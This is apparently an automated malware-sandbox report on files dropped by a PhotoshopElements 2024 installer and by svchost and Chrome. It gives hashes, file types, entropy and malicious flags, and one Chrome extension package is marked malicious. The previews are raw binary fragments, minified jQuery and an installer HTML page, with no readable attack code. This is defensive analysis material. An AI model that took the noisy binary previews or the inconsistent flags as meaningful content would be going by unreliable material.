                                                                                                      Preview:.PNG........IHDR...z..........Ay.....sBIT....|.d... .IDATx^...dWy..U.'.(."(#....H(..&K...0a...m..,^.X..Y2.......QB $!..(.Q...=.9W......)uuu....s...U..{.{..~.$.......@@ ...........@@ ...3.$..3}.............@@ ........@..@.........@@ ........s..@..X..........@@ ..........@............@@ ........s..@..X..........@@ ..........@............@@ ........s..@..X..........@@ ..........@............@@ ........s..@..X..........@@ ..........@............@@ ........s..@..X..........@@ ..........@............@@ ........s..@..X..........@@ ..........@............@@ ........s..@..X..........@@ ..........@............@@ ........s..@..X..........@@ ..........@............@@ ........s..@..X..........@@ ..........@............@@ ........s..@..X..........@@ ..........@............@@ ........s..@..X..........@@ ..........@............@@ ........s..]N......04' ..............@"....Z.......D......^.i.r@ ..........9.@5bW..9.FhL@`/A`........_h###V($..LX"..d2.....g..Y...($-...`9
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (484), with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4509
                                                                                                      Entropy (8bit):5.497933185923274
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:hSq8uLYbW1sfMUKJpmtqunn4TJPxqfR7vzf:sX+QQaym6CZ7
                                                                                                      MD5:348352BAA22F54466691B8673B6B6C93
                                                                                                      SHA1:5F6606EA02606FEC542690E80273AA5FFAAFF0AE
                                                                                                      SHA-256:39E5810ACB9489EDF3918ADB3746255866975AFC1F6AB65FFC2BA598C505D2B1
                                                                                                      SHA-512:F2749AE136CA182DF2D0FE31DDED8069D8AD915AA8BEEC02871A675BE8F0666042B5E91F4DB39F751A4AECB240DCDB1A23377EB4107EA77FB5B0A478090135D3
                                                                                                      Malicious:false
                                                                                                      Preview:<!DOCTYPE html>..<html>..<head>...<meta charset="UTF-8">..<title>PSE installer slideshow</title>..<meta name="viewport" content="width=device-width, initial-scale=1">...<link href="https://use.typekit.net/af/c2b3ac/0000000000000000000176ff/27/l?unicode=AAAIKgAAAAeBbOxmgCK-MdR34PEMRZ1Tp9CwbKr4ekaVGobt7iigFXgNffcWrPD_gJGcqz4xm1ZHNxQko2H768-q_TQrRlbWnqbTqCadCnzX6SMLdOBM8TwhjODtXWG7u6eXofuwSXdUrzPUKbfKpbP6PlW4uDR0-6_uxx_z2oPZb3FtGAlPVL4uieBXWVbsZ4asc6c4x6xRdBebJFZn5j3znnW2M2LSxdS-vENrhYjQcGpEJr10KhGz9SJjgjddqPchFHp-i9IDPTig_GvFioJvHs2SJsCuNUs-qApsimZXK9dDrVIGetZ_W6VrfDwKAGEfm-zn0HbNFllfrTmy7jrTddn22c9_90qThgAAAE4&features=ALL&v=3" rel="stylesheet">...<link rel="stylesheet" href="css/styles.css">......<style>.....html {....background-color: #fff;.....}..* {box-sizing: border-box;}..body {...margin:0px;}...mySlides {opacity: 0; position: absolute; transition: all 1s;}..img {vertical-align: middle;}..../* Slideshow container */...slideshow-container {.. max-width: 445px;.. position: relativ
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:ASCII text, with very long lines (65482), with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):93637
                                                                                                      Entropy (8bit):5.292996107428883
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:96IzxETpavYSGaW4snuHEk/yosnSFngC/VEEG0vd0KO4emAp2LSEMBoviR+I1z5T:v+vIklosn/BLXjxzMhsSQ
                                                                                                      MD5:E1288116312E4728F98923C79B034B67
                                                                                                      SHA1:8B6BABFF47B8A9793F37036FD1B1A3AD41D38423
                                                                                                      SHA-256:BA6EDA7945AB8D7E57B34CC5A3DD292FA2E4C60A5CED79236ECF1A9E0F0C2D32
                                                                                                      SHA-512:BF28A9A446E50639A9592D7651F89511FC4E583E213F20A0DFF3A44E1A7D73CEEFDB6597DB121C7742BDE92410A27D83D92E2E86466858A19803E72A168E5656
                                                                                                      Malicious:false
                                                                                                      Preview:/*! jQuery v1.8.3 jquery.com | jquery.org/license */..(function(e,t){function _(e){var t=M[e]={};return v.each(e.split(y),function(e,n){t[n]=!0}),t}function H(e,n,r){if(r===t&&e.nodeType===1){var i="data-"+n.replace(P,"-$1").toLowerCase();r=e.getAttribute(i);if(typeof r=="string"){try{r=r==="true"?!0:r==="false"?!1:r==="null"?null:+r+""===r?+r:D.test(r)?v.parseJSON(r):r}catch(s){}v.data(e,n,r)}else r=t}return r}function B(e){var t;for(t in e){if(t==="data"&&v.isEmptyObject(e[t]))continue;if(t!=="toJSON")return!1}return!0}function et(){return!1}function tt(){return!0}function ut(e){return!e||!e.parentNode||e.parentNode.nodeType===11}function at(e,t){do e=e[t];while(e&&e.nodeType!==1);return e}function ft(e,t,n){t=t||0;if(v.isFunction(t))return v.grep(e,function(e,r){var i=!!t.call(e,r,e);return i===n});if(t.nodeType)return v.grep(e,function(e,r){return e===t===n});if(typeof t=="string"){var r=v.grep(e,function(e){return e.nodeType===1});if(it.test(t))return v.filter(t,r,!n);t=v.filter(t
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1518
                                                                                                      Entropy (8bit):7.588791412640909
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:ZgAZ/2W8ZZ/2SdX6NI9mrhJdx1mOhArrVSJPWenYGJCdf06YIb04SG2MJDh/fTZg:ZgsO3nOSSNjrhAHEKGSnA4DHgt
                                                                                                      MD5:473450263C9E21654E11B09438C1D075
                                                                                                      SHA1:EDEE3F4751AE9330FDD5E48E4BAA05E6B2449F50
                                                                                                      SHA-256:3EC90F71BDD0F6B655A480622507BB21D0327D2FC4E61F7AC315D64879328D94
                                                                                                      SHA-512:A4F59F8C1B6736A0E05C64137CEBCE10EA0D063B7ABC09289BE81101C0C7559B0F70B8BC42B4386015DDD31645E12A064DD65D9B778EF6ED57E2AF61523A1487
                                                                                                      Malicious:false
                                                                                                      Preview:.............l.IAW...9..D...mM. ...........0...0..........&..a0...*.H........0..1.0...U....US1.0...U....California1.0...U....San Jose1.0...U....Adobe Systems1.0...U....Cloud Technology1#0!..U....Adobe Intermediate CA 10-40...180820132000Z..250818132000Z0..1.0...U....US1.0...U....California1.0...U....San Jose1.0...U....Adobe Systems1.0...U....Cloud Technology1'0%..U....Adobe Content Certificate 10-60.."0...*.H.............0.........{r.'..sV....S....Y....v. .....Z...6.68..g.\2N..1.*%.`u.;..|.4K2..&%B..X..\i.......?v-X....XBl...>..-s....F.N..].....~....$S...Q.... .......>.}.par..PH..e.v8`..8........&%...t.j[.`..SD.#P..CO........4p..0.9tA..W...c.6..D.'..X-.e....<..xN..N.|.....{ .%....sx..y.RtG......:.e.*.....>.[.E.K....#..X.sXI.['..woc-...<5F.C........_o...P...+.dI..G'...)......q...8..#j...}..w.c.C...tc.Q......9E...j;o..9.td.^4.T&Anv.-I......1..K...iW6...#2.......CKI..Z.\.f.8s9.@3....9.....,U........=xX.L.Uz..W...... 0.0...U...........0...U.......0.0...*.H.......
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1511
                                                                                                      Entropy (8bit):7.661447951575745
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Z9PyzmYZ/2uffZ/2W8N0jrxcONWfo9rQBE8VQldBrIKsh0UlToNMhcg/Woqr8YaJ:Z9DUOupO3WjrxPNMQrQBEOQXBcKsh0Ut
                                                                                                      MD5:5812A52C2B6DD2B88003576B8F0D287F
                                                                                                      SHA1:3BB6985E363806134D6BC3D5B7032F5BF8F8FA4B
                                                                                                      SHA-256:B6E955415746442F11B8D0859024ADAC9003EB1BEFE9EDBBE2D47412231B32A6
                                                                                                      SHA-512:7F89657064C554844A104D89EB90D15195C18E3D9FF6832A151DF4D69FC40EA0F0EF7B914384B9E052980FD955D2A24116ED4161E1983C0F11C76346D639CBA0
                                                                                                      Malicious:false
                                                                                                      Preview:.............../.h.`.IA./...3.. ...........0...0..........s-).0...*.H........0..1.0...U....US1.0...U....California1.0...U....San Jose1.0...U....Adobe Systems1.0...U....Cloud Technology1.0...U....Adobe Root CA 10-30 ..180817173759Z..20680804173759Z0..1.0...U....US1.0...U....California1.0...U....San Jose1.0...U....Adobe Systems1.0...U....Cloud Technology1#0!..U....Adobe Intermediate CA 10-40.."0...*.H.............0...........2.....b....."..O./"=..}m.?xv.;<x......y.p*.....0..ZFa.4.|."|...;*.E!>...'u....s.1..Q..b.gQP...|.(..l..m....-o...P}|..n...]..".K4k.Q.N...3.E..eg.D+.*....vo...zIF.G.......)l#..S.....].m.[....Z..X..I..,..a..x..LH...Vcw...L.E.M.^+...!..d".....!..WQ+T..kM.......j ....J>&....S....3.;=e...`.h.&................Xhd......H...Xr5......C..X.}J.a.9a.3.3.;...m..DB...ZJ....cS+=.r......iR..8.-s............)...Sa....2.c..G.F..4.#..@.8..{.v..~...Z......s.NMA.~.,..c..2....{.N...A.C.Mai..0q...\........>.......#0!0...U...........0...U.......0....0...*.H.............'
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1511
                                                                                                      Entropy (8bit):7.622242905685942
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:ZqyzzYZ/2uJZ/2W8wQ0EH8kc9q+BVTm5n3z3F33iylTfUGuchw67xE0/YSmIXO:ZVUOuXO33O9q0VTm5TF3RNUGZV7de
                                                                                                      MD5:76FC3770A8D703B19F629CF39C6AB29B
                                                                                                      SHA1:3832C78D38CE954DCB42AC17FE467BF021C30845
                                                                                                      SHA-256:6053CA69A7265B0C5B940AC96B4127537427D914D79AF5BE6DD3621CF7F48561
                                                                                                      SHA-512:2D540D42E48DC6A2B57DFA930B6B91B8A4FFDB7781148795D6A722C0578C6B26430075AA653D1A0886FD518D94692185B980EA8DE65059CA8989DABE24453F7D
                                                                                                      Malicious:false
                                                                                                      Preview:.................i..?Dy....n.... ...........0...0..........v.R.0...*.H........0..1.0...U....US1.0...U....California1.0...U....San Jose1.0...U....Adobe Systems1.0...U....Cloud Technology1.0...U....Adobe Root CA 10-30 ..180817173758Z..20680804173758Z0..1.0...U....US1.0...U....California1.0...U....San Jose1.0...U....Adobe Systems1.0...U....Cloud Technology1#0!..U....Adobe Intermediate CA 10-30.."0...*.H.............0...........*..``'....T'Ag....a......F........Je....+.f..y"Q....Iq%..c..^..xq..M.je-......g.M.;f.8....+<I`.h....=..R...c. 0.L.!...q..mV...m.5..@S...s..2<...........6.s*.a...,.fN.R....f.......~6.;..@...i.......f..jB....i.y..].~.....%...:Q..A...........u~..,...6.s5X.V.........*|.. w..i`N.X.-....a...H;0..@..Fb:.c@\..gg.....z-N&.....E.{..pcM.&...Z@.."..T.)F4...o..IL.....d.`...A.....+`s.!./.........?..^m.,'...$-..NZ*.N....y...'..?.....Y./B.b..\.l......9lw.........R.1.7.....vd....@.9..t...),.......#0!0...U...........0...U.......0....0...*.H.............{
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1518
                                                                                                      Entropy (8bit):7.64262473907766
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:ZgsAZ/2W89DKZ/2Sol0s+9FYLUd4xkSJyZDA4lbxGuEleNUkGbJQJf8e2+:ZTsO3VqOSK+kLUVlFGuEleCkGbJQJfNB
                                                                                                      MD5:8372619510C190AF2922A2E94508E3EF
                                                                                                      SHA1:3C50B758777345087D653E2BE8FF12B3B2B54023
                                                                                                      SHA-256:EAC15573507ECDCC401580981D7EF85B1575B7B7E0BA8A4A1EA26F630B4F4B69
                                                                                                      SHA-512:745B230AB52F9C0510A6E1E1FA4B96C187943D0B6883925BEDF3F825BB87557BC6FC25708ED86AA8EB6152B5011BE7AFB8709D6DB8996BA88E2D38C7248A1CD2
                                                                                                      Malicious:false
                                                                                                      Preview:...............l..5c.8%....C. ...........0...0..........hQ*@0...*.H........0..1.0...U....US1.0...U....California1.0...U....San Jose1.0...U....Adobe Systems1.0...U....Cloud Technology1#0!..U....Adobe Intermediate CA 10-30...180820131842Z..250818131842Z0..1.0...U....US1.0...U....California1.0...U....San Jose1.0...U....Adobe Systems1.0...U....Cloud Technology1'0%..U....Adobe Content Certificate 10-50.."0...*.H.............0.........K8uU.T..u.$.BU...."mx.....a(......DN....3.EQ....%p...F,.....D..._...H.....M...oL...<..G..';.KTE...X......F*E....x......h.............PH..t4.Yw....Ci4...fCI.[....Q.;?..o.;.BC....M....*.K..11.1i.......".....~..=.M..'D.g9B.n.i..U..6..b..p#.z./.h.x.....w.K.,...tIq..r..Z.2..j.9.........{up..w...>3.....N.. .$....Q.g.A....p..P...X}Iq..z$....x.5.......:.$.c..Z..jKR."..l...Y.*....UG.6..@.,T.|)....`R..j9..B....+..$4..y..m]=.......feN.V......'.."...{.&.......a......y.....)bf@..@,..B{WQ.).......... 0.0...U...........0...U.......0.0...*.H.......
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):55
                                                                                                      Entropy (8bit):4.306461250274409
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                      Malicious:false
                                                                                                      Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                      Category:dropped
                                                                                                      Size (bytes):5343305
                                                                                                      Entropy (8bit):4.740078832024785
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:49152:0moar73pQX4Agulfx8oNnu4fggX/UMo+EuSHjiaH3NQYh+VifL:0dafWX1lOcnu48h64+ONn+Vw
                                                                                                      MD5:5E3170B6B7AA492BEE7C27EA4190BC8B
                                                                                                      SHA1:6E648BE42E54630ABD75C4C861B5E3CCCBCE385F
                                                                                                      SHA-256:476E5591EBCD189639830D274F37E89C1CC3100CDBD7B7EB38F7FCFF7A270526
                                                                                                      SHA-512:7C2C3B24886FC52C54F96EF2F4CE1ED79A9906A035F5F3F3CEE52C25085CBE7F5CB83577BADDB5F6447BC6D0F2EFCFC1099DA4EB6221F991229E90054A96273F
                                                                                                      Malicious:false
                                                                                                      Preview:Cr24..............0.."0...*.H.............0...........\7c.<........Fto.8.2'5..qk...%....2...C.F.9.#..e.xQ.......[...L|....3>/....u.:T.7...(.yM...?V.<?........1.a...O?d.....A.H..'.MpB..T.m..Vn Ip..>k.|1..n.<Fb..f..*Q1.....s..2..{*.6....Pp....obM..1.......b1.......(.u^.'z......v.F.W.X4."-*eu...b.........'.tm....l...wM.Wh..(......>9.'.|..~..c(a8p.F...1.?...%.Nf g.t..h........\.X.-.at.z..Z.\...."E.1.....n..z.0I.# .vBz"A2.+0..I.n..*...e...<.W.....^..:...|g...C....y.tT<.S.3..C^Kd. ..m...C..b...2..,..L;....8O....E0...".J.q....j..O.?"..P.j...f.../.......0.."0...*.H.............0............y..D%b7...a.P....~./~.d.2..K....7K....8...g@....Ux...x..,.G.U...H`..6.(.h....2..t8..#Uf.].i....|D.I%..y.Z....e.c..UFe$p....,...s.!\$r.....r...i........#6I7u".Ev.../.z.............l...C.....vX.L..4u`..M.&.7o_..Y..;x_#'2........-1......^....`{.~.TLrD.,._ .7:\..n..&...G.E$ .A1.w.........r....E...>...i(... ..eRH..%O..)d.^w.2..,....g".^/=X.2.....&....S....><^..l^....c..D.g
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                      Category:dropped
                                                                                                      Size (bytes):7326
                                                                                                      Entropy (8bit):7.727942782725483
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:C37oyTIs04q37YgZkUBOoHMdNiP6nCm/9xjvhoRx6x82trRn:YTqU8AoH6n5zloaZN
                                                                                                      MD5:674314F5514D6F7EE43338AC4C765BFF
                                                                                                      SHA1:475BDCF05A8640634D82B60767100CDA5953396D
                                                                                                      SHA-256:03CCCBB22B17080279EA1707C9AB093C59F4F4DD09580C841CFA794CB372228D
                                                                                                      SHA-512:3731724AC6EA813251C12868C4FD6CE1E0E742D6655A9CDF638387A05330374129A261F73F93D06595FCF8A0DD558CE191A2D6D7B21F76FC54FBA2674573355F
                                                                                                      Malicious:false
                                                                                                      Preview:Cr24..............0.."0...*.H.............0...........\7c.<........Fto.8.2'5..qk...%....2...C.F.9.#..e.xQ.......[...L|....3>/....u.:T.7...(.yM...?V.<?........1.a...O?d.....A.H..'.MpB..T.m..Vn Ip..>k.|1..n.<Fb..f..*Q1.....s..2..{*.6....Pp....obM..1.......b1.......(.u^.'z......v.F.W.X4."-*eu...b.........Z......c.:..k7..O....32.k$H:...Q...a...r>xNa.....c..!....3...s.......w...{.W.&\.MY..OT!....u..}.T-._W.\^.2.8.r.t.e....i7..ug..<..t.4D...V0...X.o..G.@..._H...E....".'.)..x..]B.3....a..o1.Q..F/..m}..h|s=HX.w"..+..>.Q.....\.S.Q~..~.,9..c!.v.3j,....h[.......0.."0...*.H.............0.........bi] ,7.T#}.....L.......J...M.h.!.*ZY...D^....j...1..BaR.B...l...lk....}>#.e.Qy.g..a...r....Y.......j5.m...Z.A.....R<E...E....q/..Y!3.;'..m.L{.O".M.,.t..}.....}|..BjP.k....+...M{.;....E.i...'....k^]8.I...s..^...e.v......BV.Gk0......H.....B.=.]..`.c..p4....j....7.e.N(....].a..:...,..:....X.._.6[h..<...~.......y.b.T....1.N......+.S.../...\..7.m...5.....^.(,..#.1X.
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                      Category:dropped
                                                                                                      Size (bytes):7326
                                                                                                      Entropy (8bit):7.727942782725483
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:C37oyTIs04q37YgZkUBOoHMdNiP6nCm/9xjvhoRx6x82trRn:YTqU8AoH6n5zloaZN
                                                                                                      MD5:674314F5514D6F7EE43338AC4C765BFF
                                                                                                      SHA1:475BDCF05A8640634D82B60767100CDA5953396D
                                                                                                      SHA-256:03CCCBB22B17080279EA1707C9AB093C59F4F4DD09580C841CFA794CB372228D
                                                                                                      SHA-512:3731724AC6EA813251C12868C4FD6CE1E0E742D6655A9CDF638387A05330374129A261F73F93D06595FCF8A0DD558CE191A2D6D7B21F76FC54FBA2674573355F
                                                                                                      Malicious:false
                                                                                                      Preview:Cr24..............0.."0...*.H.............0...........\7c.<........Fto.8.2'5..qk...%....2...C.F.9.#..e.xQ.......[...L|....3>/....u.:T.7...(.yM...?V.<?........1.a...O?d.....A.H..'.MpB..T.m..Vn Ip..>k.|1..n.<Fb..f..*Q1.....s..2..{*.6....Pp....obM..1.......b1.......(.u^.'z......v.F.W.X4."-*eu...b.........Z......c.:..k7..O....32.k$H:...Q...a...r>xNa.....c..!....3...s.......w...{.W.&\.MY..OT!....u..}.T-._W.\^.2.8.r.t.e....i7..ug..<..t.4D...V0...X.o..G.@..._H...E....".'.)..x..]B.3....a..o1.Q..F/..m}..h|s=HX.w"..+..>.Q.....\.S.Q~..~.,9..c!.v.3j,....h[.......0.."0...*.H.............0.........bi] ,7.T#}.....L.......J...M.h.!.*ZY...D^....j...1..BaR.B...l...lk....}>#.e.Qy.g..a...r....Y.......j5.m...Z.A.....R<E...E....q/..Y!3.;'..m.L{.O".M.,.t..}.....}|..BjP.k....+...M{.;....E.i...'....k^]8.I...s..^...e.v......BV.Gk0......H.....B.=.]..`.c..p4....j....7.e.N(....].a..:...,..:....X.._.6[h..<...~.......y.b.T....1.N......+.S.../...\..7.m...5.....^.(,..#.1X.
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1181927
                                                                                                      Entropy (8bit):7.997580237306415
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:24576:rq9Lbk1ZSPg10//xALQtigTPnWqHAD/Dzj4ZmM4/wIwIs10XYyyJeSq3IfI+GN1s:6LQPcC0//yLlgTPWqgzDH4ZmZs6XYy8r
                                                                                                      MD5:F265D47475FFD3884329D92DEEFAE504
                                                                                                      SHA1:98C74386481F171B09CB9490281688392EEFBFDD
                                                                                                      SHA-256:C900BA9A2D8318263FD43782EE6FD5FB50BAD78BF0EB2C972B5922C458AF45ED
                                                                                                      SHA-512:4FD27594C459FB1CD94A857BE10F7D1D6216DBF202CD43E8A3FA395A268C72FC5F5C456C9CB314F2220D766AF741DB469C8BB106ACBED419149A44A3B87619F1
                                                                                                      Malicious:false
                                                                                                      Preview:Cr24..............0.."0...*.H.............0...........\7c.<........Fto.8.2'5..qk...%....2...C.F.9.#..e.xQ.......[...L|....3>/....u.:T.7...(.yM...?V.<?........1.a...O?d.....A.H..'.MpB..T.m..Vn Ip..>k.|1..n.<Fb..f..*Q1.....s..2..{*.6....Pp....obM..1.......b1.......(.u^.'z......v.F.W.X4."-*eu...b.........R....H.4.>..gg.n6:...d1.<X.R&..V...5.d..o\%r'y..W....}.Gk!..r.7.*.k.@n..^....[.&......^..>.Su...^"aZ.......>m~.....u+..O.....3$s...ABo..)........4..W.3vp^.'..OF.**........f.u.(o..).f..Yu\\..`.z.c...B.Bb.v..w.........c4r../..d|...&@Wk...W..@......0.."0...*.H.............0..........,.v@....]...<.....n..m.RI..~o.....K..+B/$.).EP....H/..}......$.]....m.Y....P.......&/.Q...@7..`.$M..(-!m...*.H....k.P......E%.(.DvnlS....d....$.|....K.......5.....k?........XG..0.... .m...c3O.......xm.x,.D.duG..F+.. Q!.NJT..&..y..LHng.'.[..._i.Pt.........w...:...q.../J..R1....N..]..b._...]y4..f......@.x..\B..h..8b0...{pi..(.....N=@..V...S..o|d;....j.Kx.A..+.
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1181927
                                                                                                      Entropy (8bit):7.997580237306415
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:24576:rq9Lbk1ZSPg10//xALQtigTPnWqHAD/Dzj4ZmM4/wIwIs10XYyyJeSq3IfI+GN1s:6LQPcC0//yLlgTPWqgzDH4ZmZs6XYy8r
                                                                                                      MD5:F265D47475FFD3884329D92DEEFAE504
                                                                                                      SHA1:98C74386481F171B09CB9490281688392EEFBFDD
                                                                                                      SHA-256:C900BA9A2D8318263FD43782EE6FD5FB50BAD78BF0EB2C972B5922C458AF45ED
                                                                                                      SHA-512:4FD27594C459FB1CD94A857BE10F7D1D6216DBF202CD43E8A3FA395A268C72FC5F5C456C9CB314F2220D766AF741DB469C8BB106ACBED419149A44A3B87619F1
                                                                                                      Malicious:true
                                                                                                      Preview:Cr24..............0.."0...*.H.............0...........\7c.<........Fto.8.2'5..qk...%....2...C.F.9.#..e.xQ.......[...L|....3>/....u.:T.7...(.yM...?V.<?........1.a...O?d.....A.H..'.MpB..T.m..Vn Ip..>k.|1..n.<Fb..f..*Q1.....s..2..{*.6....Pp....obM..1.......b1.......(.u^.'z......v.F.W.X4."-*eu...b.........R....H.4.>..gg.n6:...d1.<X.R&..V...5.d..o\%r'y..W....}.Gk!..r.7.*.k.@n..^....[.&......^..>.Su...^"aZ.......>m~.....u+..O.....3$s...ABo..)........4..W.3vp^.'..OF.**........f.u.(o..).f..Yu\\..`.z.c...B.Bb.v..w.........c4r../..d|...&@Wk...W..@......0.."0...*.H.............0..........,.v@....]...<.....n..m.RI..~o.....K..+B/$.).EP....H/..}......$.]....m.Y....P.......&/.Q...@7..`.$M..(-!m...*.H....k.P......E%.(.DvnlS....d....$.|....K.......5.....k?........XG..0.... .m...c3O.......xm.x,.D.duG..F+.. Q!.NJT..&..y..LHng.'.[..._i.Pt.........w...:...q.../J..R1....N..]..b._...]y4..f......@.x..\B..h..8b0...{pi..(.....N=@..V...S..o|d;....j.Kx.A..+.
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                      Category:dropped
                                                                                                      Size (bytes):37064
                                                                                                      Entropy (8bit):7.971992903016411
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:hCy8Oi1BjTqoAPGFT3K03Y9sTGwuuQ4bV7V5lrJgNimWE8+a:V8vBvsGB3NeduQ4bHDFC38r
                                                                                                      MD5:A562A2292F195C97C250581ABFC43411
                                                                                                      SHA1:B00AFCCCFB1CD3E8CAA9BC33A2C14D64B0C10A16
                                                                                                      SHA-256:B48B30AF5CE18C96128BFFF9D2755C7932A1F32ADC66F68322F7DD505DB9626F
                                                                                                      SHA-512:B2984E16532BEC98918EB6ABBF619FECE09D50E4F2ADB1AB3860B2CAD9FB2030955BDAA09CC8D9D0778753F7F2F864F8B3481C894921F424BDFC27CC13A535E5
                                                                                                      Malicious:false
                                                                                                      Preview:Cr24..............0.."0...*.H.............0...........\7c.<........Fto.8.2'5..qk...%....2...C.F.9.#..e.xQ.......[...L|....3>/....u.:T.7...(.yM...?V.<?........1.a...O?d.....A.H..'.MpB..T.m..Vn Ip..>k.|1..n.<Fb..f..*Q1.....s..2..{*.6....Pp....obM..1.......b1.......(.u^.'z......v.F.W.X4."-*eu...b.........qv+....B. o.}.0...l.....$.:......z.*....D.@..h..=.87..(..9PG..j.S......t.d*.K..B.f....L:k.*...w.....~.z.[.JD........H.S@..C+...^.....p...A.4W....F......7-_H..s..%.=$.;.!...Q..3..v.=..l..(..Zl.....w....;...W.....7...J.7...L.:@.Wy}.r>....RK..F.........0.."0...*.H.............0..........Dk.md)=..$.3..r......w.O........{._.-%....G....7R=.+..OA.....M~..(.t.(.R.J.."i..L_g..;.+^'..9.#../.T;-W..W_....OIC%..tRT...nB;(.i.w.W..*..^.=..<...K.}..)[$.E...U.t.......?YE.zW.2l..~.....R._...uRI...Qn..[..u.+........T(T/....(..r....qJ.6z..........F....v18..nEGY.8..kK.....".Kt....G....f..|].....\.....B%.......Y._).zeqS.,.W......]$...elu[.B..AX^rv^.21.T?.%..y....w".x..
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                      Category:dropped
                                                                                                      Size (bytes):37064
                                                                                                      Entropy (8bit):7.971992903016411
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:hCy8Oi1BjTqoAPGFT3K03Y9sTGwuuQ4bV7V5lrJgNimWE8+a:V8vBvsGB3NeduQ4bHDFC38r
                                                                                                      MD5:A562A2292F195C97C250581ABFC43411
                                                                                                      SHA1:B00AFCCCFB1CD3E8CAA9BC33A2C14D64B0C10A16
                                                                                                      SHA-256:B48B30AF5CE18C96128BFFF9D2755C7932A1F32ADC66F68322F7DD505DB9626F
                                                                                                      SHA-512:B2984E16532BEC98918EB6ABBF619FECE09D50E4F2ADB1AB3860B2CAD9FB2030955BDAA09CC8D9D0778753F7F2F864F8B3481C894921F424BDFC27CC13A535E5
                                                                                                      Malicious:false
                                                                                                      Preview:Cr24..............0.."0...*.H.............0...........\7c.<........Fto.8.2'5..qk...%....2...C.F.9.#..e.xQ.......[...L|....3>/....u.:T.7...(.yM...?V.<?........1.a...O?d.....A.H..'.MpB..T.m..Vn Ip..>k.|1..n.<Fb..f..*Q1.....s..2..{*.6....Pp....obM..1.......b1.......(.u^.'z......v.F.W.X4."-*eu...b.........qv+....B. o.}.0...l.....$.:......z.*....D.@..h..=.87..(..9PG..j.S......t.d*.K..B.f....L:k.*...w.....~.z.[.JD........H.S@..C+...^.....p...A.4W....F......7-_H..s..%.=$.;.!...Q..3..v.=..l..(..Zl.....w....;...W.....7...J.7...L.:@.Wy}.r>....RK..F.........0.."0...*.H.............0..........Dk.md)=..$.3..r......w.O........{._.-%....G....7R=.+..OA.....M~..(.t.(.R.J.."i..L_g..;.+^'..9.#../.T;-W..W_....OIC%..tRT...nB;(.i.w.W..*..^.=..<...K.}..)[$.E...U.t.......?YE.zW.2l..~.....R._...uRI...Qn..[..u.+........T(T/....(..r....qJ.6z..........F....v18..nEGY.8..kK.....".Kt....G....f..|].....\.....B%.......Y._).zeqS.,.W......]$...elu[.B..AX^rv^.21.T?.%..y....w".x..
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2877728
                                                                                                      Entropy (8bit):6.868480682648069
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:49152:GB6BoH5sOI2CHusbKOdskuoHHVjcY94RNETO2WYA4oPToqnQ3dK5zuqvGKGxofFo:M67hlnVjcYGRNETO2WYA4oLoqnJuZI5
